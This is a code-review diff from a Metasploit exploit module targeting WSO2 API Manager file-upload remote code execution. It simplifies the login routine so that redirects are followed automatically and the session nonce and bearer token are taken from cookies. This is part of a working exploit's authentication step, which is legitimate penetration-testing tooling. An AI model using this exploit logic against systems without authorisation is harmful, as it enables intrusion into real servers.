Added use of send_request_cgi!

Author: jheysel-r7

modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb

@@ -147,67 +147,44 @@ def check
 
   def authenticate
     nounce = nil
-    res = send_request_cgi(
+
+    opts = {
       'uri' => normalize_uri(target_uri.path, '/publisher/services/auth/login'),
       'method' => 'GET',
+      'headers' => {
+        'Connection' => 'keep-alive'
+      },
       'keep_cookies' => true
-    )
-
-    loop_dectector = 0
-
-    fail_with(Failure::UnexpectedReply, 'Failed to authenticate') unless res
-
-    while res.redirect?
-      loop_dectector += 1
-      res = send_request_cgi(
-        'uri' => "#{res.redirection.path}?#{res.redirection.query}",
-        'method' => 'GET',
-        'headers' => {
-          'Connection' => 'keep-alive'
-        },
-        'keep_cookies' => true
-      )
-
-      if res&.get_cookies && res.get_cookies.match(/sessionNonceCookie-(.*)=/)
-        vprint_status('Got session nonce')
-        nounce = ::Regexp.last_match(1)
-      end
-      break if nounce
-
-      fail_with(Failure::UnexpectedReply, 'Loop detected') if loop_dectector > 3
+    }
+    res = send_request_cgi!(opts, 20, 1) # timeout and redirect_depth
 
+    if res&.get_cookies && res.get_cookies.match(/sessionNonceCookie-(.*)=/)
+      vprint_status('Got session nonce')
+      nounce = ::Regexp.last_match(1)
     end
 
+    fail_with(Failure::UnexpectedReply, 'Failed to authenticate') unless nounce
+
     auth_data = {
       'usernameUserInput' => datastore['HttpUsername'],
       'username' => datastore['HttpUsername'],
       'password' => datastore['HttpPassword'],
       'sessionDataKey' => nounce
     }
 
-    res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '/commonauth'),
-      'method' => 'POST',
-      'vars_post' => auth_data
-    )
+    opts = { 'uri' => normalize_uri(target_uri.path, '/commonauth'),
+                  'method' => 'POST',
+                   'headers' => {
+                     'Connection' => 'keep-alive'
+                   },
+                   'keep_cookies' => true,
+                   'vars_post' => auth_data
+    }
 
-    loop_dectector = 0
-    while res.redirect?
-      loop_dectector += 1
-      res = send_request_cgi(
-        'uri' => "#{res.redirection.path}?#{res.redirection.query}",
-        'method' => 'GET',
-        'headers' => {
-          'Connection' => 'keep-alive'
-        },
-        'keep_cookies' => true
-      )
-      if res&.get_cookies && res.get_cookies.match(/:?WSO2_AM_TOKEN_1_Default=([\w|-]+);\s/)
-        self.bearer = ::Regexp.last_match(1)
-      end
-      break if bearer
+    res = send_request_cgi!(opts, 20, 2) # timeout and redirect_depth
 
-      fail_with(Failure::UnexpectedReply, 'Loop detected') if loop_dectector > 3
+    if res&.get_cookies && res.get_cookies.match(/:?WSO2_AM_TOKEN_1_Default=([\w|-]+);\s/)
+      self.bearer = ::Regexp.last_match(1)
     end
 
     fail_with(Failure::UnexpectedReply, 'Authentication attempt failed') unless bearer